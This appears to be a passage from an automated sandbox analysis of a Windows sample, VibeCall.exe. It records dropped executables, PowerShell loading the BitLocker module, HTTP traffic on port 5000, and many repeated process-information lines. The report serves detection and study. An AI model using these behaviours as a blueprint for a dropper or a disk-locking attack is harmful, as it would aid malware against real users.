                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmp
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: VibeCall.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: VibeCall.exeStatic PE information: section name: .CLR_UEF
                      Source: VibeCall.exeStatic PE information: section name: .didat
                      Source: VibeCall.exeStatic PE information: section name: Section
                      Source: VibeCall.exeStatic PE information: section name: _RDATA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B15D2A5 pushad ; iretd 2_2_00007FFD9B15D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B27C2C5 push ebx; iretd 2_2_00007FFD9B27C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B2700BD pushad ; iretd 2_2_00007FFD9B2700C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B342316 push 8B485F92h; iretd 2_2_00007FFD9B34231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B265835 push eax; ret 4_2_00007FFD9B265899
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B2600BD pushad ; iretd 4_2_00007FFD9B2600C1
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_014419B4 push ecx; ret 15_3_014419C7
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF525D push es; ret 15_3_02CF5264
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF3FD4 push ss; retf 15_3_02CF3FF5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF3F89 push edi; iretd 15_3_02CF3F96
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF0F6A push eax; ret 15_3_02CF0F75
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF28EC push edi; ret 15_3_02CF28F8
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF10F9 push FFFFFF82h; iretd 15_3_02CF10FB
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF44F9 push edx; retf 15_3_02CF44FC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF2C39 push ecx; ret 15_3_02CF2C59
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF21DC push eax; ret 15_3_02CF21DD
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_02CF4D5E push esi; ret 15_3_02CF4D69
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF28EC push edi; ret 15_2_02CF28F8
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF10F9 push FFFFFF82h; iretd 15_2_02CF10FB
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF44F9 push edx; retf 15_2_02CF44FC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF525D push es; ret 15_2_02CF5264
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF2C39 push ecx; ret 15_2_02CF2C59
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF21DC push eax; ret 15_2_02CF21DD
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF3FD4 push ss; retf 15_2_02CF3FF5
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF3F89 push edi; iretd 15_2_02CF3F96
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF4D5E push esi; ret 15_2_02CF4D69
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_2_02CF0F6A push eax; ret 15_2_02CF0F75
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006419B4 push ecx; ret 16_3_006419C7
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D2C39 push ecx; ret 16_3_006D2C59
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D28EC push edi; ret 16_3_006D28F8
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_006D10F9 push FFFFFF82h; iretd 16_3_006D10FB
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\soundsolution_vibecall_c.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\videosolution_vibecall_b.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59327 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59327
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59368 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59408 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59408
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59464 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 59464
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
